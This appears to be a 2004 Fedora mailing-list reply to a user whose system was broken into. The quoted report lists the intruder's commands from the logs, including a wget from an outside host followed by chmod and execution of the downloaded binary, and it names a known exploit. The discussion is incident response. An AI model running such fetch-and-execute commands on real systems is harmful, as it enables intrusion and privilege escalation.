Your box has been compromised. You should wipe the disk and restore your data from a recent backup. See http://vil.nai.com/vil/content/v_99397.htm > Someone logged into my system on 13 Nov 2004 > I found the following in /var/log/wtmp > > 207-36-180-20.prt.primarydns.com > demo.allegientsystems.com > > My user password was changed - but not the root password - and the > following commands had been executed:- > > w > uname -a > cat /etc/issue > cd /tmp > wget chebeleu.com/local > chmod +x local > ./local -d -r > ./local -d -r > lunx > lynx > > There is a similar report dated 10-Nov-2004 at > http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631 > where someone suggested it might be the exploit at > http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php > > Anybody know any more ? > > -- > fedora-test-list mailing list > fedora-test-list@xxxxxxxxxx > To unsubscribe: > http://www.redhat.com/mailman/listinfo/fedora-test-list >